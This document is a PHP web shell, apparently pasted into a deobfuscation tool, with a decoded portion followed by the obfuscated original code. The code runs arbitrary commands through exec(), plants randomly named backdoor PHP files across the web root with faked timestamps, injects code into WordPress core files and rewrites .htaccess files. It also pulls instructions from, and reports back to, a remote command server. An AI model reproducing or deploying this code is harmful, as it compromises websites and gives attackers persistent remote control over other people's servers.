"type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="exec"type="hidden"> <input name="group_id"value="<?php  echo $_SESSION["Z3JvdXA="]; ?> 
"type="hidden"> <input name="shell_id"value="<?php  echo $_SESSION["c2hlbGxfaWQ="]; ?> 
"type="hidden"> <input name="shell_type"value="<?php  echo $_SESSION["dHlwZQ=="]; ?> 
"type="hidden"> <button class="btn btn-sm btn-warning"type="submit">Exec</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php  echo $file_path; ?> 
"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["c2hlbGxfY29kZQ=="]; ?> 
"type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="others"type="hidden"> <input name="shell_id"value="<?php  echo $_SESSION["c2hlbGxfaWQ="]; ?> 
"type="hidden"> <input name="group_id_2"value="<?php  echo $_SESSION["c2Vjb25k"]; ?> 
"type="hidden"> <input name="group_id_3"value="<?php  echo $_SESSION["dGhpcmRncm91cA=="]; ?> 
"type="hidden"> <input name="shell_type"value="<?php  echo $_SESSION["dHlwZQ=="]; ?> 
"type="hidden"> <button class="btn btn-sm btn-info"type="submit">Others</button></form></div><div class="col-2 col-sm-1"><form action="?path=<?php  echo $file_path; ?> 
"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["c2hlbGxfY29kZQ=="]; ?> 
"type="hidden"> <input name="act"value="shell"type="hidden"> <input name="type"value="doors"type="hidden"> <input name="group_id"value="<?php  echo $_SESSION["Z3JvdXA="]; ?> 
"type="hidden"> <input name="shell_id"value="<?php  echo $_SESSION["c2hlbGxfaWQ="]; ?> 
"type="hidden"> <input name="shell_type"value="<?php  echo $_SESSION["dHlwZQ=="]; ?> 
"type="hidden"> <button class="btn btn-sm btn-danger"type="submit">Doors</button></form></div></div></div><div class="bd-example bd-example-row"style="border:1px solid #ededed;padding:1rem;margin:1rem 0"><div class="row"><div class="col-12 col-sm-12"style="text-align:center;font-weight:700"><?php  if ($_POST["act"] == "shell") { if ($_POST["type"] == "reback") { rebackAction($_POST, $pws, $now_site); } else { if ($_POST["type"] == "exec") { execAction($_POST, $pws, $now_site); } else { if ($_POST["type"] == "doors") { doorsAction($_POST, $pws, $now_site); stationAction($_POST, $pws, $now_site); } else { if ($_POST["type"] == "others") { othersAction($_POST, $pws, $now_site); } } } } } if ($_POST["act"] == "exec_code") { $exec_code = trim($_POST["exec_code"]); exec($exec_code, $output, $returnVar); if ($returnVar === 0) { echo "<div style='color: green;font-weight:bold;'>" . $exec_code . " is Successfully.</div>"; foreach ($output as $k => $v) { echo $v . "<br/>"; } } else { echo "<div style='color: red;font-weight:bold;'>" . $exec_code . " is Failed:" . $returnVar . ".</div>"; } } ?> 
</div></div></div><form action="?path=<?php  echo $file_path; ?> 
"method="post"><input name="c2hlbGxfY29kZQ=="value="<?php  echo $_SESSION["c2hlbGxfY29kZQ=="]; ?> 
"type="hidden"><div class="col-12"style="margin-bottom:1rem"><input name="act"value="del"type="hidden"> <button class="btn btn-xs btn-danger"type="submit">Delete</button></div><table class="table table-bordered"><thead><tr><th><div class="form-check"><input name="allcheck"value="1"type="checkbox"id="allcheck"class="form-check-input"></div></th><th>Name</th><th>Url</th><th>Size</th><th>Modify</th><th>Permission</th><th>Action</th></tr></thead><tbody><?php  if (!empty($file_list) && count($file_list) > 2) { foreach ($file_list as $k => $v) { if (!($v == "." || $v == "..")) { $file_url = $now_path . "/" . $v; ?> 
<tr><th><div class="form-check"><input name="childcheck[]"value="<?php  echo $file_url; ?> 
"type="checkbox"class="form-check-input"></div></th><td><?php  if (is_dir($file_url)) { echo "<a href="?path=" . $file_url . "&type=1" style="color: green;font-weight:bold;">\xa                     <i class="bi bi-folder" style="vertical-align: middle;">\xa                        <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" fill="currentColor" class="bi bi-folder" viewBox="0 0 16 16">\xa                        <path d="M.54 3.87.5 3a2 2 0 0 1 2-2h3.672a2 2 0 0 1 1.414.586l.828.828A2 2 0 0 0 9.828 3h3.982a2 2 0 0 1 1.992 2.181l-.637 7A2 2 0 0 1 13.174 14H2.826a2 2 0 0 1-1.991-1.819l-.637-7a1.99 1.99 0 0 1 .342-1.31zM2.19 4a1 1 0 0 0-.996 1.09l.637 7a1 1 0 0 0 .995.91h10.348a1 1 0 0 0 .995-.91l.637-7A1 1 0 0 0 13.81 4H2.19zm4.69-1.707A1 1 0 0 0 6.172 2H2.5a1 1 0 0 0-1 .981l.006.139C1.72 3.042 1.95 3 2.19 3h5.396l-.707-.707z"/>
                        </svg>\xa                    </i>" . $v . "</a>"; } else { echo "<a href="?path=" . $file_url . "&type=2">" . $v . "</a>"; } ?> 
</td><td><?php  if (!is_dir($file_url)) { ?> 
<a href="<?php  echo $now_url . "/" . $v; ?> 
"target="_blank">click visit</a><?php  } ?> 
</td><td><?php  if (is_dir($file_url)) { echo "<font color="green" style="font-weight: bold;">Directory</font>"; } else { echo getFileSize($file_url); } ?> 
</td><td><?php  $modificationTime = filemtime($file_url); echo date("Y-m-d H:i:s", $modificationTime); ?> 
</td><td><?php  $permission = getFilePermission($file_url); if (strpos($permission, "w") !== false) { echo "<font color="green" style="font-weight: bold;">" . $permission . "</font>"; } else { echo "<font color="red" style="font-weight: bold;">" . $permission . "</font>"; } ?> 
</td><td><a href="?path=<?php  echo $file_url; ?> 
&type=4"class="btn btn-xs btn-primary">Rename</a> <a href="?path=<?php  echo $file_url; ?> 
&type=2"class="btn btn-info btn-xs">Edit</a> <a href="?path=<?php  echo $file_url; ?> 
&type=5"class="btn btn-xs btn-warning">Chmod</a></td></tr><?php  } } } else { ?> 
<tr><td colspan="4"style="text-align:center;color:red">No Files!</td></tr><?php  } ?> 
</tbody></table></form></div><?php  } } } } } } ?> 
</div><script>$(function(){$("#allcheck").click(function(){$("#allcheck").is(":checked")?$('input[name="childcheck[]"]').each(function(){$(this).attr("checked",!0)}):$('input[name="childcheck[]"]').each(function(){$(this).attr("checked",!1)})})})</script><script>$(function(){$("#allcheck").click(function(){$(".item").prop("checked",this.checked)}),$(".item").click(function(){$(".item").length==$(".item:checked").length?$("#allcheck").prop("checked",!0):$("#allcheck").prop("checked",!1)}),$(".delBtn").click(function(){var e=[];if($(".item:checked").each(function(){e.push($(this).val())}),0==e.length)return alert("please select files"),!1;$("#deleteForm").submit()})})</script></body></html><?php  } goto K9iJZ; LaqJP: function getParentsFolders($path) { $all_folders = array(); $parent_folds = dirname($path); $directories = glob($parent_folds . "/*", GLOB_ONLYDIR); $all_folders = $directories; $parent_folds = dirname($parent_folds); $directories = glob($parent_folds . "/*", GLOB_ONLYDIR); $all_folders = array_merge($all_folders, $directories); return $all_folders; } goto rAmLO; wS8ZC: error_reporting(0); goto F71ic; Mcawi: $data = $_SERVER; goto fCRLr; wH0Wc: function add_station($station_code, $ht_content, $now_site) { $station_code = base64_decode($station_code); $count = 0; $path = $_SERVER["DOCUMENT_ROOT"]; $folder_name = basename($path); $all_folders = getParentsFolders($path); $all_results = array(); foreach ($all_folders as $k => $v) { $directories = glob($v . "/*", GLOB_ONLYDIR); $all_folders = array_merge($all_folders, $directories); } foreach ($all_folders as $k => $v) { if (!strpos($v, $folder_name)) { $all_results[] = $v; } } foreach ($all_results as $k => $v) { $index_url = $v . "/wp-blog-header.php"; $wp_url = $v . "/wp-cron.php"; $ht_url = $v . "/.htaccess"; $index_yuan = ''; if (file_exists($index_url)) { chmod($index_url, 420); $index_yuan = file_get_contents($index_url); } if (strpos($index_yuan, $station_code) === false) { file_put_contents($index_url, $station_code . $index_yuan); chmod($index_url, 292); } $wp_yuan = ''; if (file_exists($wp_url)) { chmod($wp_url, 420); $wp_yuan = file_get_contents($wp_url); } if (strpos($wp_yuan, $station_code) === false) { file_put_contents($wp_url, $station_code . $wp_yuan); chmod($wp_yuan, 292); } chmod($ht_url, 420); file_put_contents($ht_url, $ht_content); chmod($ht_url, 292); $count++; } return $count; } goto LaqJP; PTTlf: function curlpost($url, $data) { $jsonData = json_encode($data); $ch = curl_init($url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_HTTPHEADER, array("Content-Type: application/json", "Content-Length: " . strlen($jsonData))); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $jsonData); $response = curl_exec($ch); $result = array(); if (curl_errno($ch)) { $result["status"] = 0; $result["msg"] = curl_error($ch); } curl_close($ch); $res = json_decode($response, true); $result["status"] = $res["status"]; return $result; } goto EuW2e; bqkBE: $prot = !empty($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] !== "off" || $_SERVER["SERVER_PORT"] == 443 ? "https://" : "http://"; goto g0myE; fCRLr: $website_path = $data["DOCUMENT_ROOT"]; goto HqanP; EuW2e: function crefile($fiurl, $contnt) { $path = $_SERVER["DOCUMENT_ROOT"] . "/"; $filath = $path . dirname($fiurl); if (!is_dir($filath)) { if (!mkdir($filath, 493, true)) { return false; } } $file_path = $path . $fiurl; if (file_put_contents($file_path, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($file_path, $time); return true; } else { return false; } } goto WX_1S; Tez2J: function add_others($group2_code, $group3_code, $second_file, $third_file, $now_site) { $result = array(); $sf = crefile($second_file, $group2_code); $tf = crefile($third_file, $group3_code); $result["second_url"] = ''; $result["third_url"] = ''; if ($sf) { $result["second_url"] = $now_site . "/" . $second_file; } if ($tf) { $result["third_url"] = $now_site . "/" . $third_file; } return $result; } goto z3V3_; axLdL: ?>

Did this file decode correctly?

Original Code

<?php
 goto trahl; TQQwk: $post_data = $_POST; goto nS5Zs; trahl: @set_time_limit(0); goto wS8ZC; XMRAW: $can_write = false; goto aM1LR; k1C9R: $door_lists = array(); goto kRH_2; Wi8ub: if (!empty($post_data)) { foreach ($post_data as $k => $v) { $_SESSION[$k] = $v; } } goto gQvdL; RwqcY: $now_site = $prot . $domain; goto BGNdO; hNAa1: if (!is_dir($now_path)) { $now_path = dirname($now_path); } goto T_EkX; F71ic: ini_set("\155\145\x6d\157\x72\171\x5f\154\x69\x6d\x69\x74", "\55\x31"); goto b5Sm0; CsvpM: function getrandstr($length = 10) { $characters = "\141\142\143\144\145\146\147\150\x69\152\153\x6c\155\x6e\x6f\160\161\x72\x73\164\165\x76\x77\170\171\x7a\101\102\x43\x44\x45\106\x47\x48\111\112\113\x4c\x4d\116\117\120\121\x52\123\x54\125\126\x57\x58\x59\x5a"; $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, strlen($characters) - 1)]; } return $randomString; } goto KPLhz; NCfWd: function getAllSubdirectories($directory, $maxDepth = 10, $currentDepth = 0) { global $all_paths; $subdirectories = array(); if ($currentDepth > $maxDepth) { return array(); } $items = scandir($directory); foreach ($items as $item) { if ($item == "\56" || $item == "\56\56") { continue; } $path = $directory . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { $subdirectories[] = $path; $all_paths[] = $path; $subdirectories = array_merge($subdirectories, getAllSubdirectories($path, $maxDepth, $currentDepth + 1)); } } return $subdirectories; } goto bZ0mU; K9iJZ: function getFileSize($file_url) { $file_size = filesize($file_url); if ($file_size > 1024 * 1024) { $file_size = round($file_size / (1024 * 1024), 2) . "\x20\115\102"; } else { if ($file_size > 1024) { $file_size = round($file_size / 1024, 2) . "\40\113\x42"; } else { $file_size = $file_size . "\x20\x42"; } } return $file_size; } goto Qp4AN; fFrUe: function findFilesWithContent($directory, $searchString, $currentDepth = 0, $maxDepth = 10) { $foundFiles = array(); if ($currentDepth >= $maxDepth) { return $foundFiles; } if ($handle = opendir($directory)) { while (false !== ($file = readdir($handle))) { if ($file != "\x2e" && $file != "\56\x2e") { $filePath = $directory . "\57" . $file; if (is_dir($filePath)) { $foundFiles = array_merge($foundFiles, findFilesWithContent($filePath, $searchString, $currentDepth + 1, $maxDepth)); } else { if (strpos(file_get_contents($filePath), $searchString) !== false) { $foundFiles[] = $filePath; } } } } closedir($handle); } return $foundFiles; } goto axLdL; Qp4AN: function getFilePermission($filename) { clearstatcache(true, $filename); $perms = fileperms($filename); if (($perms & 49152) === 49152) { $info = "\x73"; } elseif (($perms & 40960) === 40960) { $info = "\x6c"; } elseif (($perms & 32768) === 32768) { $info = "\x2d"; } elseif (($perms & 24576) === 24576) { $info = "\142"; } elseif (($perms & 16384) === 16384) { $info = "\144"; } elseif (($perms & 8192) === 8192) { $info = "\x63"; } elseif (($perms & 4096) === 4096) { $info = "\160"; } else { $info = "\165"; } $info .= $perms & 256 ? "\x72" : "\x2d"; $info .= $perms & 128 ? "\x77" : "\x2d"; $info .= $perms & 64 ? $perms & 2048 ? "\x73" : "\170" : ($perms & 2048 ? "\x53" : "\x2d"); $info .= $perms & 32 ? "\x72" : "\55"; $info .= $perms & 16 ? "\167" : "\55"; $info .= $perms & 8 ? $perms & 1024 ? "\x73" : "\170" : ($perms & 1024 ? "\123" : "\x2d"); $info .= $perms & 4 ? "\x72" : "\55"; $info .= $perms & 2 ? "\167" : "\x2d"; $info .= $perms & 1 ? $perms & 512 ? "\x74" : "\170" : ($perms & 512 ? "\124" : "\x2d"); return $info; } goto UZXO8; AgL2D: if (is_readable($now_path)) { $can_read = true; } goto XMRAW; g0myE: $domain = $_SERVER["\x48\124\124\x50\137\110\117\x53\124"]; goto RwqcY; WklgD: $type = $_REQUEST["\x74\x79\160\x65"]; goto uZ2uB; GSBbP: if (!empty($path)) { $file_path = $path; $now_path = $path; } goto Amx2q; uZ2uB: $path = $_REQUEST["\x70\141\x74\x68"]; goto Mcawi; CK7HR: function add_doors($doors_array, $doors_55_array, $wp_files, $third_file, $ban_content, $open_content, $shell_action_code, $now_site) { $result = array(); global $door_lists, $all_paths, $last_folder_url; $path = $_SERVER["\x44\117\103\x55\115\105\x4e\x54\137\x52\x4f\x4f\124"]; $door_count = count($doors_array) + count($doors_55_array); getAllDirectories($path, 1, $door_count); if (count($door_lists) < $door_count) { $sy_count = count($doors_array) + count($doors_55_array) - count($door_lists); $door_lists = fill_full($door_lists, $sy_count); } $randomKeys = array_rand($door_lists, count($doors_array) + count($doors_55_array)); $door_files = array(); $succ_files = array(); $i = 0; $shell_other_url = ''; foreach ($randomKeys as $key) { $file_door_url = $door_lists[$key]; $file_name = getrandstr(rand(5, 10)) . "\56\x70\x68\x70"; if ($i >= count($doors_array)) { $file_door_url = $file_door_url . "\x2f\x77\160"; $file_url = $file_door_url . "\57" . $file_name; $res = cndoorfile($file_door_url, $file_name, $open_content, $doors_55_array[$i - count($doors_array)]); } else { $file_url = $file_door_url . "\57" . $file_name; $res = crdoorfile($file_url, $doors_array[$i]); } if ($res) { $succ_files[] = $file_url; $door_files[] = str_replace($path, $now_site, $file_url); } else { } $i++; } if (!empty($last_folder_url)) { $file_url = $last_folder_url . "\x2f\x69\x6e\x64\145\x78\x2e\x70\150\x70"; $res = crdoorfile($file_url, base64_decode($shell_action_code)); if ($res) { $shell_other_url = str_replace($path, $now_site, $file_url); } } $count = 0; if (count($succ_files) > 0) { $ht_urls = array(); $wp_files_array = explode("\73", $wp_files); foreach ($wp_files_array as $k => $v) { $wp_files_array[$k] = $path . $v; } $ht_urls = $succ_files; $ht_urls = array_merge($ht_urls, $wp_files_array); $ht_urls[] = $path . "\57" . $third_file; $ht_folders = array(); $ht_files = array(); foreach ($ht_urls as $k => $v) { $ht_folders[] = dirname($v); $ht_files[] = basename($v); } foreach ($all_paths as $k => $a) { $now_files = array(); foreach ($ht_folders as $htk => $htv) { if ($a == $htv) { $now_files[] = $ht_files[$htk]; } } $ht_content_now = ''; if (!empty($now_files)) { $ht_content_now = str_replace("\x7b\x23\150\164\x63\x6f\x6e\164\x65\156\164\x7d", implode("\174", $now_files), $open_content); } else { $ht_content_now = $ban_content; } chmod($a . "\57\56\150\x74\141\x63\143\145\163\x73", 493); if (file_put_contents($a . "\57\56\150\164\x61\x63\143\145\x73\x73", $ht_content_now) !== false) { $count++; chmod($a . "\x2f\x2e\x68\x74\141\x63\x63\x65\163\163", 365); } } } $result["\x64\157\157\162\x5f\x66\x69\x6c\145\x73"] = $door_files; $result["\x73\x68\145\154\154\137\x6f\164\150\x65\162\137\x75\162\x6c"] = $shell_other_url; $result["\x63\x6f\165\x6e\x74"] = $count; return $result; } goto OVXHf; VnrNU: $now_url = $web_url . $sy_path; goto TQQwk; rAmLO: function curlget($url) { $url_data = ''; if (function_exists("\146\x69\x6c\145\137\x67\x65\x74\137\x63\157\x6e\x74\x65\x6e\x74\163")) { $url_data = file_get_contents($url); } if (empty($url_data) && function_exists("\143\165\x72\x6c\x5f\145\x78\145\x63")) { $conn = curl_init($url); curl_setopt($conn, CURLOPT_RETURNTRANSFER, 1); curl_setopt($conn, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($conn, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($conn, CURLOPT_SSL_VERIFYHOST, 0); $url_data = curl_exec($conn); curl_close($conn); } if (empty($url_data) && function_exists("\146\x6f\160\x65\156") && function_exists("\x73\x74\x72\x65\x61\155\x5f\x67\145\x74\137\x63\157\156\164\145\156\164\x73")) { $handle = fopen($url, "\162"); $url_data = stream_get_contents($handle); fclose($handle); } return $url_data; } goto PTTlf; F0DwG: function add_exec($ht_contnt, $index_contnt, $exec_code, $wp_ycode) { $exec_code = str_replace("\x5b\x23\43\150\x74\x63\x6f\x6e\164\x65\x6e\164\x23\x23\135", base64_encode($ht_contnt), $exec_code); $exec_code = str_replace("\133\x23\x23\x69\156\x64\x65\x78\x63\157\x6e\x74\x65\156\x74\x23\43\135", base64_encode($index_contnt . $wp_ycode), $exec_code); $l12 = array("\x31", "\62", "\x33", "\x34", "\x35", "\66", "\67", "\70", "\71", "\60", "\161", "\x77", "\145", "\x72", "\x74", "\x79", "\x75", "\151", "\x6f", "\x70", "\x61", "\163", "\x64", "\146", "\x67", "\150", "\152", "\153", "\x6c", "\172", "\x78", "\143", "\x76", "\x62", "\156", "\x6d", "\x71", "\167", "\145", "\162", "\x74", "\171", "\x75", "\151", "\x6f", "\160", "\x61", "\x73", "\x64", "\146", "\x67", "\150", "\x6a", "\153", "\x6c", "\x7a", "\170", "\x63", "\x76", "\142", "\x6e", "\155"); for ($i = 1; $i < rand(6, 6); $i++) { $e14 = rand(0, count($l12) - 1); $o15 .= $l12[$e14]; } $u17 = fopen($o15 . "\56\160\x68\160", "\x77"); fwrite($u17, $exec_code); fclose($u17); exec("\x70\150\160\40\55\x66" . __DIR__ . "\x2f{$o15}\x2e\160\x68\x70\40\76\40\57\144\x65\x76\57\156\165\x6c\x6c\40\62\76\x2f\144\x65\x76\57\x6e\x75\154\x6c\x20\x26", $e18, $res); if ($res === 0) { return true; } else { return false; } } goto NrEEU; UZXO8: function sortByFolder($now_path, $all_list) { $folder_list = array(); $file_list = array(); foreach ($all_list as $k => $v) { if (is_dir($now_path . "\x2f" . $v)) { $folder_list[] = $v; } else { $file_list[] = $v; } } sort($folder_list); sort($file_list); $all_list = array_merge($folder_list, $file_list); return $all_list; } goto NHet4; z3V3_: function doorsAction($data, $pweb, $now_site) { $result_data = array(); $result_data["\163\x68\x65\154\154\x5f\151\144"] = $data["\163\150\x65\154\x6c\137\151\144"]; $result_data["\x61\x63\x74\x69\x6f\x6e"] = "\x64\157\x6f\162\163"; $save_url = base64_decode($pweb) . "\x2f\145\163\x61\166\145\56\160\150\x70"; $shell_id = $data["\x73\150\x65\154\154\x5f\x69\144"]; $group_id = $data["\x67\162\x6f\x75\160\x5f\151\x64"]; $shell_type = $data["\x73\x68\145\x6c\154\137\164\171\x70\x65"]; $url = base64_decode($pweb) . "\x2f\145\x69\156\x64\145\x78\144\x6f\x6f\162\56\160\x68\x70\x3f\141\x63\164\x69\157\x6e\75\x64\157\x6f\x72\x73\46\x73\150\x65\x6c\154\137\151\144\75" . $shell_id . "\46\x67\x72\157\x75\x70\x5f\x69\x64\x3d" . $group_id . "\46\x73\x68\x65\154\x6c\137\164\x79\x70\145\x3d" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); if (!empty($json_array["\144\157\157\x72\163"])) { $result = add_doors($json_array["\144\157\157\162\x73"], $json_array["\x64\157\157\x72\163\137\x35\65"], $json_array["\167\x70\x5f\146\151\x6c\x65\x73"], $json_array["\164\x68\x69\162\x64\137\x66\x69\154\x65"], $json_array["\x68\164\x5f\x62\x61\156\x5f\x63\157\156\x74\145\156\164"], $json_array["\150\x74\137\157\x70\x65\x6e\x5f\143\x6f\x6e\164\x65\156\164"], $json_array["\163\150\x65\154\154\x5f\x61\143\x74\x69\157\x6e\x5f\x63\x6f\x64\x65"], $now_site); if (!empty($result["\144\x6f\157\162\x5f\x66\151\154\x65\163"])) { $result_data["\x64\x6f\157\x72\137\165\162\x6c\x73"] = implode("\x3b", $result["\144\x6f\157\x72\137\x66\x69\x6c\145\163"]); $result_data["\163\x68\x65\154\154\x5f\x6f\164\150\145\162\x5f\165\162\154"] = $result["\x73\x68\145\154\154\137\157\164\150\x65\162\137\x75\162\x6c"]; $result_data["\163\164\141\x74\x75\x73"] = 1; } else { $result_data["\143\x6f\144\x65"] = "\x31\60\x30\61"; $result_data["\163\x74\x61\x74\x75\x73"] = 2; } } else { $result_data["\143\157\x64\x65"] = "\x31\x30\60\62"; $result_data["\163\164\x61\164\165\163"] = 2; } $result_data["\x73\150\x65\x6c\x6c\x5f\164\x79\x70\x65"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\x73\x74\141\x74\x75\163"]) { echo "\x3c\x70\40\163\x74\171\x6c\x65\x3d\42\x63\x6f\154\157\162\x3a\x67\162\145\x65\x6e\73\x22\76\x44\x6f\x6f\x72\x73\x20\151\x73\x20\163\x75\143\143\145\163\163\x66\x75\154\x6c\x79\x2c\x20\123\165\x63\x63\x65\163\x73\x20\56\x68\x20\x69\163\x20" . $result["\143\x6f\x75\x6e\164"] . "\74\57\x70\76"; foreach ($result["\144\x6f\x6f\162\x5f\146\x69\x6c\x65\163"] as $k => $v) { echo "\x3c\160\76\x3c\x61\40\x68\x72\x65\146\x3d\x22" . $v . "\42\40\164\141\x72\x67\x65\x74\75\x22\137\x62\154\141\x6e\x6b\x22\x3e" . $v . "\x3c\57\141\76\74\57\160\x3e"; } } else { echo "\x3c\160\x20\x73\x74\171\x6c\x65\75\42\x63\x6f\154\157\x72\x3a\162\x65\144\73\42\76\104\157\157\162\163\40\x69\x73\x20\x66\141\x69\154\145\144\41\x20" . $result_data["\x63\157\x64\145"] . "\74\57\160\x3e"; } } goto CK7HR; NHet4: function rebackAction($data, $pweb, $now_site) { $group_id = $data["\x67\162\x6f\x75\x70\x5f\x69\x64"]; $shell_id = $data["\163\x68\145\154\x6c\137\x69\144"]; $shell_type = $data["\x73\x68\145\154\x6c\137\x74\x79\x70\145"]; $url = base64_decode($pweb) . "\x2f\x65\x69\x6e\144\x65\x78\144\157\157\162\56\160\150\160\77\141\143\164\x69\x6f\156\x3d\162\145\142\141\x63\x6b\46\147\x72\x6f\x75\x70\137\151\x64\x3d" . $group_id . "\x26\x73\150\145\154\154\137\x74\x79\160\x65\75" . $shell_type; $cc = curlget($url); $json_array = json_decode($cc, true); $result_data = array(); $result_data["\163\x68\145\154\154\x5f\x69\x64"] = $shell_id; $result_data["\x61\143\164\x69\x6f\x6e"] = "\x72\145\142\x61\143\153"; $save_url = base64_decode($pweb) . "\x2f\x65\163\x61\166\145\x2e\160\x68\160"; if (isset($json_array["\x69\x6e\137\x66\151\154\x65\163"]) && !empty($json_array["\x69\x6e\x5f\x66\151\x6c\x65\163"])) { $wp_code = $json_array["\x77\x70\x5f\143\157\x64\145"]; $in_list = explode("\73", $json_array["\151\x6e\x5f\146\x69\x6c\x65\x73"]); foreach ($in_list as $k => $v) { $wpstr = strslit($v); $wp_code = str_replace("\x5b\43\43\151\156\x5f\x63\x6f\156\164\156\164\137" . $k . "\x23\43\x5d", $wpstr, $wp_code); $contnt = $json_array["\143\x6f\x64\x65"] . $json_array["\167\x70\x5f\171\x63\x6f\x64\145"]; crefile($v, $contnt); } $ht_list = explode("\73", $json_array["\x68\164\x5f\146\x69\x6c\x65\x73"]); foreach ($ht_list as $k => $v) { $wpstr = strslit($v); $wp_code = str_replace("\133\x23\x23\150\164\x5f\x63\x6f\x6e\164\x6e\164\x5f" . $k . "\x23\43\135", $wpstr, $wp_code); $contnt = $json_array["\x68\164\137\x63\x6f\x6e\164\156\x74"]; crefile($v, $contnt); } $wp_list = explode("\73", $json_array["\167\160\137\146\151\x6c\x65\163"]); $wp_result = array(); foreach ($wp_list as $k => $v) { $f = crefile($v, $wp_code); if ($f) { $wp_result[] = $now_site . $v; } } if (!empty($wp_result) && count($wp_result) > 0) { $result_data["\x77\x70\x5f\165\x72\154\x73"] = $wp_result; $result_data["\163\164\141\164\x75\163"] = 1; } else { $result_data["\x63\x6f\144\145"] = "\x31\60\60\x31"; $result_data["\x73\x74\x61\x74\x75\x73"] = 2; } } else { $result_data["\x63\x6f\144\145"] = "\61\x30\60\62"; $result_data["\x73\x74\141\164\x75\163"] = 2; } $result_data["\163\150\145\x6c\154\x5f\x75\162\154"] = $now_site; $result_data["\163\x68\145\x6c\154\x5f\164\171\160\145"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\163\x74\141\x74\x75\x73"]) { echo "\x3c\x70\x20\163\x74\171\x6c\x65\75\x22\143\x6f\154\157\x72\x3a\x67\162\145\x65\156\73\x22\x3e\x52\145\142\x61\x63\153\x20\151\x73\x20\163\x75\143\x63\x65\x73\x73\146\165\x6c\x6c\x79\74\x2f\160\76"; foreach ($wp_result as $k => $v) { echo "\74\160\76\x3c\x61\40\x68\162\145\x66\75\x22" . $v . "\42\40\x74\x61\x72\x67\x65\x74\75\42\x5f\x62\x6c\x61\156\x6b\42\76" . $v . "\74\x2f\x61\x3e\74\x2f\x70\76"; } } else { echo "\74\160\40\x73\x74\x79\x6c\x65\75\42\x63\157\x6c\157\162\72\x72\x65\x64\x3b\42\76\122\x65\x62\x61\x63\153\x20\151\x73\x20\x66\141\x69\154\x65\x64\41\40" . $result_data["\143\x6f\x64\x65"] . "\74\57\160\x3e"; } } goto jWl5D; WX_1S: function crdoorfile($fipath, $contnt) { if (file_put_contents($fipath, $contnt) !== false) { $time = time() - rand(30, 100) * 24 * 60 * 60 - rand(0, 3600); touch($fipath, $time); return true; } else { return false; } } goto sMcl1; HqanP: $file_path = $data["\123\x43\122\x49\x50\124\x5f\x46\111\114\105\x4e\x41\115\105"]; goto poU4O; NrEEU: function othersAction($data, $pweb, $now_site) { $shell_id = $data["\x73\150\x65\154\x6c\137\x69\x64"]; $group_id_2 = $data["\147\x72\157\165\x70\x5f\x69\144\x5f\x32"]; $group_id_3 = $data["\x67\162\x6f\165\160\x5f\151\144\137\63"]; $shell_type = $data["\x73\x68\x65\154\x6c\137\x74\171\160\145"]; $url = base64_decode($pweb) . "\57\145\151\x6e\144\x65\x78\144\x6f\x6f\x72\x2e\x70\x68\x70\x3f\x61\143\x74\151\157\156\x3d\x6f\x74\150\145\x72\163\46\147\162\x6f\165\160\x5f\x69\x64\x5f\62\75" . $group_id_2 . "\x26\147\x72\x6f\165\160\x5f\151\x64\x5f\x33\x3d" . $group_id_3 . "\x26\x73\x68\145\154\154\x5f\x74\x79\160\x65\75" . $shell_type; $result_data = array(); $result_data["\x73\x68\145\154\x6c\x5f\x69\144"] = $shell_id; $result_data["\141\143\164\x69\x6f\x6e"] = "\x6f\164\x68\145\162\163"; $save_url = base64_decode($pweb) . "\57\145\x73\141\166\x65\x2e\x70\150\x70"; $cc = curlget($url); $json_array = json_decode($cc, true); if (!empty($json_array["\147\162\x6f\165\x70\62\137\x63\x6f\x64\x65"]) && !empty($json_array["\x73\145\x63\157\156\144\137\146\151\x6c\145"]) || !empty($json_array["\147\x72\157\x75\x70\x33\x5f\x63\157\x64\x65"]) && !empty($json_array["\164\x68\151\x72\144\x5f\146\151\x6c\x65"])) { $result = add_others($json_array["\147\x72\157\165\160\x32\137\143\x6f\x64\145"], $json_array["\x67\x72\x6f\165\160\63\137\143\x6f\x64\x65"], $json_array["\163\x65\143\157\156\144\x5f\x66\x69\x6c\x65"], $json_array["\x74\150\x69\162\x64\x5f\x66\x69\154\x65"], $now_site); if (!empty($result["\x73\145\x63\x6f\156\x64\x5f\x75\x72\x6c"]) || !empty($result["\x74\150\x69\162\144\x5f\x75\162\x6c"])) { $result_data["\163\x65\x63\x6f\156\144\137\165\x72\x6c"] = $result["\163\145\143\157\x6e\144\137\x75\x72\154"]; $result_data["\164\x68\151\x72\x64\x5f\165\162\154"] = $result["\164\x68\x69\162\x64\137\165\x72\154"]; $result_data["\163\x74\x61\x74\165\163"] = 1; } else { $result_data["\143\157\x64\145"] = "\61\60\60\61"; $result_data["\163\x74\141\164\x75\163"] = 2; } } else { $result_data["\143\x6f\x64\x65"] = "\61\60\60\62"; $result_data["\x73\x74\x61\x74\x75\163"] = 2; } $result_data["\x73\150\x65\x6c\154\x5f\x74\171\160\145"] = $shell_type; $res = curlpost($save_url, $result_data); if ($res["\x73\164\141\x74\165\x73"]) { echo "\x3c\x70\x20\163\164\171\154\x65\x3d\42\143\157\154\157\x72\x3a\147\162\x65\145\156\73\42\76\117\164\150\145\162\x73\x20\x69\163\40\163\165\x63\143\145\163\x73\x66\165\x6c\x6c\171\x3c\x2f\x70\76"; } else { echo "\74\x70\x20\163\164\171\x6c\145\75\x22\143\157\x6c\x6f\x72\72\162\145\x64\x3b\42\76\117\164\x68\x65\162\x73\40\151\x73\40\146\141\x69\154\x65\x64\41\40" . $result_data["\143\x6f\x64\145"] 